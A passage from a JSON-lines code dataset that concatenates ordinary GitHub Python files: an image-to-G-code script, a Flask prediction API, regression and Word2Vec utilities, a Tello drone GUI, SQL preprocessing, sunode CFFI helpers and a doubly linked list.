\"/home/antonio/Desktop/python scripts/robot club/Jpeg2Gcode/test images/dots.png\" ######################### Change this to the path of your image file png or jpeg\nimage = cv2.imread(image_path)\n\n# Check if the image is valid\nif image is None:\n print(\"Error: Image file not found or not valid.\")\n sys.exit(1)\n\n# Convert to grayscale\ngray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Apply Sobel edge extraction to the image\nsobel_x = cv2.Sobel(gray_image, cv2.CV_64F, 1, 0, ksize=5)\nsobel_y = cv2.Sobel(gray_image, cv2.CV_64F, 0, 1, ksize=5)\nsobel_edges = cv2.magnitude(sobel_x, sobel_y)\nsobel_edges = cv2.normalize(sobel_edges, None, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)\n\n################# Modify the values below to determine the working area as well as the pen thicknes. the pen thickness determines how we merge the lines. \n# Define your scaling factors and pen thickness here\nscale_x = 1\nscale_y = 1\npen_thickness = 5\n#################\nimage_to_gcode(sobel_edges, \"GCODE.nc\", scale_x=scale_x, scale_y=scale_y, pen_thickness=pen_thickness)\nprint(\"G-code saved as GCODE.nc\")\n\n \n\n","repo_name":"AntonioUl/Image2Gcode","sub_path":"jpeg2Gcode_liftoffeverymove.py","file_name":"jpeg2Gcode_liftoffeverymove.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5334594086","text":"import numpy as np\nfrom flask import Flask, request, jsonify\nimport pickle\n\napp = Flask(__name__)\nmodel = pickle.load(open('model/salary_model.pkl','rb'))\n\n@app.route('/api',methods=['POST'])\ndef predict():\n data = request.get_json(force=True)\n prediction = model.predict([[np.array(data['exp'])]])\n output = prediction[0]\n return jsonify(output)\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)\n\n ","repo_name":"statkclee/nlp2","sub_path":"flaskapp/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"7616814384","text":"import numpy as np\nimport pandas as pd\nimport scipy.stats\nimport copy\n\nfrom inferelator.utils import Debug, InferelatorData\nfrom inferelator.distributed.inferelator_mp import MPControl\nfrom inferelator.utils import Validator as check\n\nDEFAULT_CHUNK = 25\nPROGRESS_STR = \"Regression on {gn} [{i} / {total}]\"\n\n\nclass BaseRegression(object):\n # These are all the things that have to be set in a new regression class\n\n chunk = DEFAULT_CHUNK # int\n\n # Raw Data\n X = None # [K x N] float\n Y = None # [G x N] float\n G = None # int G\n K = None # int K\n\n def __init__(self, X, Y):\n \"\"\"\n Create a regression object and do basic data transforms\n\n :param X: Expression or Activity data [N x K]\n :type X: InferelatorData\n :param Y: Response expression data [N x G]\n :type Y: InferelatorData\n \"\"\"\n\n # Get the IDs and total count for the genes and predictors\n self.K = X.num_genes\n self.tfs = X.gene_names\n self.G = Y.num_genes\n self.genes = Y.gene_names\n\n # Rescale the design expression or activity data on features\n self.X = X\n self.X.zscore()\n\n self.Y = Y\n\n Debug.vprint(\"Predictor matrix {pr} and response matrix {re} ready\".format(pr=X.shape, re=Y.shape))\n\n def run(self):\n \"\"\"\n Execute regression separately on each response variable in the data\n\n :return: pd.DataFrame [G x K], pd.DataFrame [G x K]\n Returns the regression betas and beta error reductions for all threads if this is the master thread (rank 0)\n Returns None, None if it's a subordinate thread\n \"\"\"\n\n run_data = self.regress()\n\n if MPControl.is_master:\n pileup_data = self.pileup_data(run_data)\n else:\n pileup_data = None, None\n\n MPControl.sync_processes(\"post_pileup\")\n return pileup_data\n\n def regress(self):\n \"\"\"\n Execute regression and return a list which can be provided to pileup_data\n :return: list\n \"\"\"\n raise NotImplementedError\n\n def pileup_data(self, run_data):\n \"\"\"\n Take the completed run data and pack it up into a DataFrame of betas\n\n :param run_data: list\n A list of regression result dicts ordered by gene. Each regression result should have `ind`, `pp`, `betas`\n and `betas_resc` keys with the appropriate data.\n :return betas, betas_rescale: (pd.DataFrame [G x K], pd.DataFrame [G x K])\n \"\"\"\n\n # Create G x K arrays of 0s to populate with the regression data\n betas = np.zeros((self.G, self.K), dtype=np.dtype(float))\n betas_rescale = np.zeros((self.G, self.K), dtype=np.dtype(float))\n\n # Populate the zero arrays with the BBSR betas\n for data in run_data:\n\n # If data is None assume a null model\n if data is None:\n raise RuntimeError(\"No model produced by regression method\")\n\n xidx = data['ind'] # Int\n yidx = data['pp'] # Boolean array of size K\n betas[xidx, yidx] = data['betas']\n betas_rescale[xidx, yidx] = data['betas_resc']\n\n d_len, b_avg, null_m = self._summary_stats(betas)\n Debug.vprint(\"Regression complete:\", end=\" \", level=0)\n Debug.vprint(\"{d_len} Models, {b_avg} Preds per Model ({nom} Null)\".format(d_len=d_len,\n b_avg=round(b_avg, 4),\n nom=null_m), level=0)\n\n # Convert arrays into pd.DataFrames to return results\n betas = pd.DataFrame(betas, index=self.Y.gene_names, columns=self.X.gene_names)\n betas_rescale = pd.DataFrame(betas_rescale, index=self.Y.gene_names, columns=self.X.gene_names)\n\n return betas, betas_rescale\n\n @staticmethod\n def _summary_stats(arr):\n d_len = arr.shape[0]\n b_avg = np.mean(np.sum(arr != 0, axis=1))\n null_m = np.sum(np.sum(arr != 0, axis=1) == 0)\n return d_len, b_avg, null_m\n\n\nclass RegressionWorkflow(object):\n \"\"\"\n RegressionWorkflow implements run_regression and run_bootstrap\n Each regression method needs to extend this to implement run_bootstrap (and also run_regression if necessary)\n \"\"\"\n\n def set_regression_parameters(self, **kwargs):\n \"\"\"\n Set any parameters which are specific to one or another regression method\n \"\"\"\n pass\n\n def run_regression(self):\n betas = []\n rescaled_betas = []\n\n MPControl.sync_processes(\"pre_regression\")\n\n for idx, bootstrap in enumerate(self.get_bootstraps()):\n Debug.vprint('Bootstrap {} of {}'.format((idx + 1), self.num_bootstraps), level=0)\n np.random.seed(self.random_seed + idx)\n current_betas, current_rescaled_betas = self.run_bootstrap(bootstrap)\n if self.is_master():\n betas.append(current_betas)\n rescaled_betas.append(current_rescaled_betas)\n\n MPControl.sync_processes(\"post_bootstrap\")\n\n return betas, rescaled_betas\n\n def run_bootstrap(self, bootstrap):\n raise NotImplementedError\n\n\ndef recalculate_betas_from_selected(x, y, idx=None):\n \"\"\"\n Estimate betas from a selected subset of predictors\n :param x: np.ndarray [N x k]\n Predictor matrix\n :param y: np.ndarray [N x 1]\n Response matrix\n :param idx: np.ndarray [k x 1]\n Predictors to use (unused predictors will return a beta of 0)\n If None, use all predictors\n :return: np.ndarray [k,]\n Estimated beta-hats\n \"\"\"\n\n # Create an array of size [k,] to hold the estimated betas\n best_betas = np.zeros(x.shape[1], dtype=np.dtype(float))\n\n # Use all predictors if no subset index is passed in\n if idx is None:\n idx = np.ones(x.shape[1], dtype=np.dtype(bool))\n\n # Convert boolean array to an array of indexes\n idx = bool_to_index(idx)\n\n # Subset the predictors with the index array\n x = x[:, idx]\n\n # Solve for beta-hat with LAPACK or return a null model if xTx is singular\n xtx = np.dot(x.T, x)\n if np.linalg.matrix_rank(xtx) == xtx.shape[1]:\n beta_hat = np.linalg.solve(np.dot(x.T, x), np.dot(x.T, y))\n else:\n beta_hat = np.zeros(len(idx), dtype=np.dtype(float))\n\n # Use the index array to write beta-hats\n # This yields the same size result matrix as number of predictors in x\n # (even if x is subset with an index)\n for i, j in enumerate(idx):\n best_betas[j] = beta_hat[i]\n return best_betas\n\n\ndef predict_error_reduction(x, y, betas):\n \"\"\"\n Predict the error reduction from each predictor\n :param x: np.ndarray [n x k]\n :param y: np.ndarray [n x 1]\n :param betas: np.ndarray [k x 1]\n :return: np.ndarray [k,]\n \"\"\"\n assert check.argument_type(betas, np.ndarray)\n\n (n, k) = x.shape\n pp_idx = index_of_nonzeros(betas).tolist()\n\n # Calculate the variance of the residuals\n ss_all = sigma_squared(x, y, betas)\n error_reduction = np.zeros(k, dtype=np.dtype(float))\n\n if len(pp_idx) == 1:\n error_reduction[pp_idx] = 1 - (ss_all / np.var(y, ddof=1))\n return error_reduction\n\n for pp_i in range(len(pp_idx)):\n # Copy the index of predictors\n leave_out = copy.copy(pp_idx)\n # Pull off one of the predictors\n lost = leave_out.pop(pp_i)\n\n # Reestimate betas for all the predictors except the one that we removed\n x_leaveout = x[:, leave_out]\n try:\n xt = x_leaveout.T\n xtx = np.dot(xt, x_leaveout)\n xty = np.dot(xt, y)\n beta_hat = scipy.linalg.solve(xtx, xty, assume_a='sym')\n except np.linalg.LinAlgError:\n beta_hat = np.zeros(len(leave_out), dtype=np.dtype(float))\n\n # Calculate the variance of the residuals for the new estimated betas\n ss_leaveout = sigma_squared(x_leaveout, y, beta_hat)\n\n # Check to make sure that the ss_all and ss_leaveout differences aren't just precision-related\n if np.abs(ss_all - ss_leaveout) < np.finfo(float).eps * len(pp_idx):\n error_reduction[lost] = 0.\n else:\n error_reduction[lost] = 1 - (ss_all / ss_leaveout)\n\n return error_reduction\n\n\ndef sigma_squared(x, y, betas):\n return np.var(np.subtract(y, np.dot(x, betas).reshape(-1, 1)), ddof=1)\n\n\ndef index_of_nonzeros(arr):\n \"\"\"\n Returns an array that indexes all the non-zero elements of an array\n :param arr: np.ndarray\n :return: np.ndarray\n \"\"\"\n return np.where(arr != 0)[0]\n\n\ndef bool_to_index(arr):\n \"\"\"\n Returns an array that indexes all the True elements of a boolean array\n :param arr: np.ndarray\n :return: np.ndarray\n \"\"\"\n assert check.argument_type(arr, np.ndarray)\n return np.where(arr)[0]\n","repo_name":"moqri/inferelator","sub_path":"inferelator/regression/base_regression.py","file_name":"base_regression.py","file_ext":"py","file_size_in_byte":8903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"34809179728","text":"import gensim\r\nimport numpy as np\r\nimport scipy.sparse as sp\r\nfrom gensim.models import Word2Vec as _Word2Vec\r\nfrom distutils.version import LooseVersion\r\n\r\n\r\ndef normalized_laplacian_matrix(graph, r=-0.5):\r\n graph = graph + sp.eye(graph.shape[0], dtype=graph.dtype, format='csr')\r\n\r\n degree = graph.sum(1).A1\r\n degree_power = np.power(degree, r)\r\n graph = graph.tocoo(copy=False)\r\n graph.data *= degree_power[graph.row]\r\n graph.data *= degree_power[graph.col]\r\n graph = graph.tocsr(copy=False)\r\n return graph\r\n\r\n\r\nclass Word2Vec(_Word2Vec):\r\n \"\"\"A compatible version of Word2Vec\"\"\"\r\n\r\n def __init__(self, sentences=None, sg=0, hs=0, alpha=0.025, iter=5, size=100, window=5, workers=3, negative=5, seed=None, **kwargs):\r\n if LooseVersion(gensim.__version__) <= LooseVersion(\"4.0.0\"):\r\n super().__init__(sentences,\r\n size=size,\r\n window=window,\r\n min_count=0,\r\n alpha=alpha,\r\n sg=sg,\r\n workers=workers,\r\n iter=iter,\r\n negative=negative,\r\n hs=hs,\r\n compute_loss=True,\r\n seed=seed, **kwargs)\r\n\r\n else:\r\n super().__init__(sentences,\r\n vector_size=size,\r\n window=window,\r\n min_count=0,\r\n alpha=alpha,\r\n sg=sg,\r\n workers=workers,\r\n epochs=iter,\r\n negative=negative,\r\n hs=hs,\r\n compute_loss=True,\r\n seed=seed, **kwargs)\r\n\r\n def get_embedding(self):\r\n if LooseVersion(gensim.__version__) <= LooseVersion(\"4.0.0\"):\r\n embedding = self.wv.vectors[np.fromiter(\r\n map(int, self.wv.index2word), np.int32).argsort()]\r\n else:\r\n embedding = self.wv.vectors[np.fromiter(\r\n map(int, self.wv.index_to_key), np.int32).argsort()]\r\n\r\n return embedding\r\n","repo_name":"EdisonLeeeee/GraphGallery","sub_path":"graphgallery/gallery/embedding/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":450,"dataset":"github-code","pt":"52"} +{"seq_id":"39467452546","text":"from PIL import Image\nimport numpy as np\nfrom config import TMP_DIR, LEGISLATURA, MEMBERS\n\n\ndef load_images() -> np.array:\n files = [f\"{TMP_DIR}/{i+1}_{LEGISLATURA}.jpg\" for i in range(MEMBERS)]\n images = []\n for file in files:\n image_data = np.asarray(Image.open(file))\n # normalize to range [0, 1], from [0, 255]\n images.append(image_data.astype('float32') / 255)\n\n ret = np.asarray(images)\n return ret\n\ndef save_image(image_array, filename):\n rgb = image_array*255\n image = Image.fromarray(np.uint8(rgb), 'RGB')\n image.save(filename)\n","repo_name":"liopic/all-are-the-same","sub_path":"image_utils.py","file_name":"image_utils.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25060385698","text":"from djitellopy import Tello\nimport cv2\nimport tkinter.font as tkFont\nimport tkinter as tk\nimport threading\n\n\nclass App:\n drone = Tello()\n\n def __init__(self, root):\n # setting title StreamTest.start()\n root.title(\"undefined\")\n # setting window size\n width = 423\n height = 256\n screenwidth = root.winfo_screenwidth()\n screenheight = root.winfo_screenheight()\n alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)\n root.geometry(alignstr)\n root.resizable(width=False, height=False)\n\n GButton_412 = tk.Button(root)\n GButton_412[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_412[\"font\"] = ft\n GButton_412[\"fg\"] = \"#000000\"\n GButton_412[\"justify\"] = \"center\"\n GButton_412[\"text\"] = \"Up\"\n GButton_412.place(x=70, y=40, width=70, height=25)\n GButton_412[\"command\"] = self.GButton_412_command\n\n GButton_132 = tk.Button(root)\n GButton_132[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_132[\"font\"] = ft\n GButton_132[\"fg\"] = \"#000000\"\n GButton_132[\"justify\"] = \"center\"\n GButton_132[\"text\"] = \"Down\"\n GButton_132.place(x=70, y=100, width=70, height=25)\n GButton_132[\"command\"] = self.GButton_132_command\n\n GButton_889 = tk.Button(root)\n GButton_889[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_889[\"font\"] = ft\n GButton_889[\"fg\"] = \"#000000\"\n GButton_889[\"justify\"] = \"center\"\n GButton_889[\"text\"] = \"Right\"\n GButton_889.place(x=140, y=70, width=70, height=25)\n GButton_889[\"command\"] = self.GButton_889_command\n\n GButton_387 = tk.Button(root)\n GButton_387[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_387[\"font\"] = ft\n GButton_387[\"fg\"] = \"#000000\"\n GButton_387[\"justify\"] = \"center\"\n GButton_387[\"text\"] = \"Left\"\n GButton_387.place(x=0, y=70, width=70, height=25)\n GButton_387[\"command\"] = self.GButton_387_command\n\n GButton_473 = tk.Button(root)\n GButton_473[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_473[\"font\"] = ft\n GButton_473[\"fg\"] = \"#000000\"\n GButton_473[\"justify\"] = \"center\"\n GButton_473[\"text\"] = \"Forward\"\n GButton_473.place(x=350, y=40, width=70, height=25)\n GButton_473[\"command\"] = self.GButton_473_command\n\n GButton_437 = tk.Button(root)\n GButton_437[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_437[\"font\"] = ft\n GButton_437[\"fg\"] = \"#000000\"\n GButton_437[\"justify\"] = \"center\"\n GButton_437[\"text\"] = \"Backward\"\n GButton_437.place(x=350, y=100, width=70, height=25)\n GButton_437[\"command\"] = self.GButton_437_command\n\n GButton_356 = tk.Button(root)\n GButton_356[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_356[\"font\"] = ft\n GButton_356[\"fg\"] = \"#000000\"\n GButton_356[\"justify\"] = \"center\"\n GButton_356[\"text\"] = \"L\"\n GButton_356.place(x=170, y=140, width=70, height=25)\n GButton_356[\"command\"] = self.GButton_356_command\n\n GButton_404 = tk.Button(root)\n GButton_404[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_404[\"font\"] = ft\n GButton_404[\"fg\"] = \"#000000\"\n GButton_404[\"justify\"] = \"center\"\n GButton_404[\"text\"] = \"R\"\n GButton_404.place(x=260, y=140, width=70, height=25)\n GButton_404[\"command\"] = self.GButton_404_command\n\n GMessage_349 = tk.Message(root)\n ft = tkFont.Font(family='Times', size=10)\n GMessage_349[\"font\"] = ft\n GMessage_349[\"fg\"] = \"#333333\"\n GMessage_349[\"justify\"] = \"center\"\n GMessage_349[\"text\"] = \"Tello :)\"\n GMessage_349.place(x=200, y=20, width=80, height=25)\n\n GButton_320 = tk.Button(root)\n GButton_320[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_320[\"font\"] = ft\n GButton_320[\"fg\"] = \"#000000\"\n GButton_320[\"justify\"] = \"center\"\n GButton_320[\"text\"] = \"Connect\"\n GButton_320.place(x=0, y=190, width=70, height=25)\n GButton_320[\"command\"] = self.GButton_320_command\n\n GButton_760 = tk.Button(root)\n GButton_760[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_760[\"font\"] = ft\n GButton_760[\"fg\"] = \"#000000\"\n GButton_760[\"justify\"] = \"center\"\n GButton_760[\"text\"] = \"Disconnect\"\n GButton_760.place(x=0, y=220, width=70, height=25)\n GButton_760[\"command\"] = self.GButton_760_command\n\n GButton_472 = tk.Button(root)\n GButton_472[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_472[\"font\"] = ft\n GButton_472[\"fg\"] = \"#000000\"\n GButton_472[\"justify\"] = \"center\"\n GButton_472[\"text\"] = \"Takeoff\"\n GButton_472.place(x=350, y=190, width=70, height=25)\n GButton_472[\"command\"] = self.GButton_472_command\n\n GButton_769 = tk.Button(root)\n GButton_769[\"bg\"] = \"#efefef\"\n ft = tkFont.Font(family='Times', size=10)\n GButton_769[\"font\"] = ft\n GButton_769[\"fg\"] = \"#000000\"\n GButton_769[\"justify\"] = \"center\"\n GButton_769[\"text\"] = \"Land\"\n GButton_769.place(x=350, y=220, width=70, height=25)\n GButton_769[\"command\"] = self.GButton_769_command\n\n def GButton_412_command(self):\n self.drone.move_up(40)\n\n def GButton_132_command(self):\n self.drone.move_down(40)\n\n def GButton_889_command(self):\n self.drone.move_right(40)\n\n def GButton_387_command(self):\n self.drone.move_left(40)\n\n def GButton_473_command(self):\n self.drone.move_forward(40)\n\n def GButton_437_command(self):\n self.drone.move_back(40)\n\n def GButton_356_command(self):\n self.drone.rotate_clockwise(30)\n\n def GButton_404_command(self):\n self.drone.rotate_counter_clockwise(30)\n\n def showStream(self):\n self.drone.streamon()\n while True:\n img = self.drone.get_frame_read().frame\n cv2.imshow(\"image\", img)\n cv2.waitKey(1)\n\n def GButton_320_command(self):\n self.drone.connect()\n streamTest = threading.Thread(target=self.showStream)\n streamTest.start()\n print(self.drone.get_battery())\n\n def GButton_760_command(self):\n self.drone.end()\n\n\n def GButton_472_command(self):\n self.drone.takeoff()\n\n def GButton_769_command(self):\n self.drone.land()\n\n","repo_name":"MorsyB/Graphics-Lab","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":6825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42850189421","text":"import re\nfrom random import Random\nfrom typing import Dict, Optional\n\n\nSQL_TOKENS = {\n \"select\",\n \"from\",\n \"where\",\n \"group\",\n \"order\",\n \"limit\",\n \"intersect\",\n \"union\",\n \"except\",\n \"join\",\n \"on\",\n \"as\",\n \"not\",\n \"between\",\n \"=\",\n \">\",\n \"<\",\n \">=\",\n \"<=\",\n \"!=\",\n \"in\",\n \"like\",\n \"is\",\n \"exists\",\n \"none\",\n \"max\",\n \"min\",\n \"count\",\n \"sum\",\n \"avg\",\n \"or\",\n \"and\",\n}\n\n\ndef clean_str(target: str) -> Optional[str]:\n if not target:\n return None\n\n target = re.sub(r\"[^\\x00-\\x7f]\", r\" \", target)\n line = re.sub(r\"''\", r\" \", target)\n line = re.sub(r\"``\", r\" \", line)\n line = re.sub(r\"\\\"\", r\"'\", line)\n line = re.sub(r\" +\", \" \", line)\n return line.strip()\n\n\ndef add_schema_description(\n lower: bool, add_column_types: bool, tables_json: Dict, shuffle_schema: bool, random: Random\n):\n\n table_names = tables_json[\"table_names_original\"]\n\n if shuffle_schema:\n random.shuffle(table_names)\n\n columns = [\n (column_name[0], column_name[1], column_type)\n for column_name, column_type in zip(tables_json[\"column_names_original\"], tables_json[\"column_types\"])\n ]\n schema_description = \"\"\n schema_structured = {}\n for table_index, table_name in enumerate(table_names):\n if lower:\n table_name = table_name.lower()\n if table_index == 0:\n schema_description += \" \" + table_name\n else:\n schema_description += \" \" + table_name\n schema_structured[table_name] = []\n schema_description += \" \"\n table_columns = [column for column in columns if column[0] == table_index]\n\n if shuffle_schema:\n random.shuffle(table_columns)\n\n for table_column in table_columns:\n if add_column_types:\n column_desc = (\n f\" \"\n f\"{table_column[1].lower() if lower else table_column[1]}\"\n )\n else:\n column_desc = f\"{table_column[1].lower() if lower else table_column[1]}\"\n schema_description += \" \" + column_desc\n schema_structured[table_name].append(column_desc)\n\n return schema_description, schema_structured\n","repo_name":"hirupert/sede","sub_path":"src/preprocessing/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"52"} +{"seq_id":"31804089267","text":"from __future__ import annotations\n\nimport logging\nfrom typing import (\n Optional,\n Union,\n NewType,\n List,\n Any,\n Callable\n)\n\n\nimport numpy as np # type: ignore\nimport numba # type: ignore\nfrom numba.core.typing import cffi_utils # type: ignore\n\nfrom sunode import _cvodes\n\n\n__all__ = [\n \"lib\", \"ffi\", \"ERRORS\", \"Borrows\", \"notnull\",\n \"check\", \"check_ptr\", \"check_code\", \"as_numpy\"\n]\n\n\nlogger = logging.getLogger(\"sunode.basic\")\n\nlib: Any = _cvodes.lib\nffi: Any = _cvodes.ffi\n\ncffi_utils.register_module(_cvodes)\ncffi_utils.register_type(\n ffi.typeof(\"N_Vector\").item, numba.types.Opaque(\"N_Vector\")\n)\ncffi_utils.register_type(\n ffi.typeof(\"SUNMatrix\").item, numba.types.Opaque(\"SUNMatrix\")\n)\n\n_data_dtype = cffi_utils.map_type(ffi.typeof(\"realtype\"))\n_index_dtype = cffi_utils.map_type(ffi.typeof(\"sunindextype\"))\ndata_dtype: Any = np.dtype(_data_dtype.name)\nindex_dtype: Any = np.dtype(_index_dtype.name)\n\n\nCPointer = NewType(\"CPointer\", int)\n\n\nERRORS = {}\nfor name in dir(lib):\n item = getattr(lib, name)\n if not isinstance(item, int):\n continue\n if name.startswith('CV_') or name.startswith('CVLS_') or name.startswith('SUN_NLS_'):\n ERRORS[item] = name\n\n\nclass Borrows:\n def __init__(self) -> None:\n self._borrowed: List[Any] = []\n\n def borrow(self, arg: Any) -> None:\n self._borrowed.append(arg)\n\n def release_borrowed_func(self) -> Callable[[], None]:\n borrowed = self._borrowed\n\n # Does not keep a reference to self\n def release() -> None:\n borrowed.clear()\n\n return release\n\n\ndef notnull(ptr: CPointer, msg: Optional[str] = None) -> CPointer:\n if ptr == ffi.NULL:\n if msg is None:\n raise ValueError(\"CPointer is NULL.\")\n else:\n raise ValueError(msg)\n return ptr\n\n\ndef check(retcode: Union[int, CPointer]) -> Union[None, CPointer]:\n if isinstance(retcode, int) and retcode != 0:\n raise ValueError('Bad return code from sundials: %s (%s)' % (ERRORS[retcode], retcode))\n if isinstance(retcode, ffi.CData):\n if retcode == ffi.NULL:\n raise ValueError('Return value of sundials is NULL.')\n return retcode\n return None\n\n\ndef check_ptr(retval: CPointer) -> CPointer:\n if retval == ffi.NULL:\n raise ValueError('Return value of sundials is NULL.')\n return retval\n\n\ndef check_code(retval: int) -> int:\n if retval != 0:\n raise ValueError('Bad return code from sundials: %s (%s)' % (ERRORS[retval], retval))\n return retval\n\n\nclass RefCount:\n def __init__(self) -> None:\n self.count: int = 0\n\n def borrow(self) -> None:\n self.count += 1\n\n def release(self) -> None:\n assert self.count > 0\n self.count -= 1\n\n def is_zero(self) -> bool:\n assert self.count >= 0\n return self.count == 0\n\n\ndef as_numpy(\n owner: Any,\n ptr: CPointer,\n size: int,\n dtype: np.dtype,\n counter: Optional[RefCount] = None,\n) -> np.ndarray:\n if size < 0:\n raise ValueError(\"Array size must not be negative.\")\n\n if size != 0:\n notnull(ptr)\n\n def release(ptr: CPointer) -> None:\n nonlocal owner\n if counter is not None:\n counter.release()\n\n if counter is not None:\n counter.borrow()\n ptr = ffi.gc(ptr, release)\n buffer = ffi.buffer(ptr, size * dtype.itemsize)\n return np.frombuffer(buffer, dtype)\n","repo_name":"pymc-devs/sunode","sub_path":"sunode/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"52"} +{"seq_id":"23598109764","text":"from collections import defaultdict\n\nclass Node:\n\tdef __init__(self,data):\n\t\tself.data=data\n\t\tself.next=None\n\t\tself.prev=None\n\n\nclass Doubly:\n\tdef __init__(self):\n\t\tself.head = None\n\n\n\tdef append(self, data):\n\t\tnew_node = Node(data)\n\t\tif self.head is None:\n\t\t\t# new_node.prev = None\n\t\t\tself.head = new_node\n\t\telse:\n\t\t\tcur=self.head\n\t\t\twhile cur.next:\n\t\t\t\tcur=cur.next\n\n\t\t\tcur.next=new_node\n\t\t\tnew_node.prev=cur\n\t\t\tnew_node.next=None\n\n\n\tdef prepend(self,data):\n\t\tnew_node=Node(data)\n\t\tif self.head is None:\n\t\t\tself.head = new_node\n\t\telse:\n\t\t\tself.head.prev = new_node\n\t\t\tnew_node.next= self.head\n\t\t\tself.head = new_node\n\tdef add_after(self,data,key):\n\t\tnew_node=Node(data)\n\t\tcur=self.head\n\n\t\twhile cur:\n\t\t\tif cur.data==key:\n\t\t\t\tnxt=cur.next\n\t\t\t\tcur.next=new_node\n\t\t\t\tnew_node.prev=cur\n\t\t\t\tnew_node.next=nxt\n\t\t\t\tnxt.prev=new_node\n\t\t\t\treturn\n\t\t\tcur=cur.next\n\n\t\tprint('key not found')\n\n\tdef display(self):\n\t\tcur = self.head\n\n\t\twhile cur:\n\t\t\tprint(cur.data)\n\t\t\tcur=cur.next\n\n\tdef reverse(self):\n\t\ttemp = None\n\t\tcur=self.head\n\n\t\twhile cur:\n\t\t\ttemp=cur.prev\n\t\t\tcur.prev=cur.next\n\t\t\tcur.next=temp\n\t\t\tcur=cur.prev\n\t\tif temp:\n\t\t\tself.head=temp.prev\n\n\tdef pairs_with_sum(self,sum_val):\n\t\tpairs = []\n\t\tp = self.head\n\t\tq=None\n\t\twhile p:\n\t\t\tq=p.next\n\t\t\twhile q:\n\t\t\t\tif p.data+q.data==sum_val:\n\t\t\t\t\tpairs.append([p.data,q.data])\n\t\t\t\tq=q.next\n\t\t\tp=p.next\n\t\treturn pairs\n\n\tdef remove_duplicates(self):\n\t\tcur = self.head\n\t\tduplicates=defaultdict(int)\n\t\t# prev=\n\n\t\twhile cur:\n\t\t\tif duplicates[cur.data]==0:\n\t\t\t\tduplicates[cur.data]+=1\n\t\t\t\tcur=cur.next\n\t\t\telse:\n\t\t\t\tnxt=cur.next\n\t\t\t\tself.delete_node(cur)\n\t\t\t\tcur=nxt\n\n\tdef delete(self,key):\n\t\tcur =self.head\n\n\t\twhile cur:\n\t\t\t\n\t\t\tif cur.data==key and cur==self.head:\n\t\t\t\t#case 1:\n\t\t\t\tif not cur.next:\n\t\t\t\t\tcur=None\n\t\t\t\t\tself.head=None\n\t\t\t\t\treturn\n\t\t\t\t# case 2:\n\t\t\t\telse:\n\t\t\t\t\tnxt=cur.next\n\t\t\t\t\tcur.next=None\n\t\t\t\t\tcur=None\n\t\t\t\t\tnxt.prev=None\n\t\t\t\t\tself.head=nxt\n\t\t\t\t\treturn\n\n\t\t\telif cur.data==key:\n\t\t\t\t#case 3\n\t\t\t\tif cur.next:\n\t\t\t\t\tnxt=cur.next\n\t\t\t\t\tprev=cur.prev\n\t\t\t\t\tprev.next=nxt\n\t\t\t\t\tnxt.prev=prev\n\t\t\t\t\tcur.next=None\n\t\t\t\t\tcur.prev=None\n\t\t\t\t\tcur=None\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\t# case 4\n\t\t\t\t\tprev=cur.prev\n\t\t\t\t\tprev.next=None\n\t\t\t\t\tcur.prev=None\n\t\t\t\t\tcur=None\n\t\t\t\t\treturn\n\n\t\t\tcur=cur.next\n\n\tdef delete_node(self,node):\n\t\tcur =self.head\n\n\t\twhile cur:\n\t\t\t\n\t\t\tif cur==node and cur==self.head:\n\t\t\t\t#case 1:\n\t\t\t\tif not cur.next:\n\t\t\t\t\tcur=None\n\t\t\t\t\tself.head=None\n\t\t\t\t\treturn\n\t\t\t\t# case 2:\n\t\t\t\telse:\n\t\t\t\t\tnxt=cur.next\n\t\t\t\t\tcur.next=None\n\t\t\t\t\tcur=None\n\t\t\t\t\tnxt.prev=None\n\t\t\t\t\tself.head=nxt\n\t\t\t\t\treturn\n\n\t\t\telif cur==node:\n\t\t\t\t#case 3\n\t\t\t\tif cur.next:\n\t\t\t\t\tnxt=cur.next\n\t\t\t\t\tprev=cur.prev\n\t\t\t\t\tprev.next=nxt\n\t\t\t\t\tnxt.prev=prev\n\t\t\t\t\tcur.next=None\n\t\t\t\t\tcur.prev=None\n\t\t\t\t\tcur=None\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\t# case 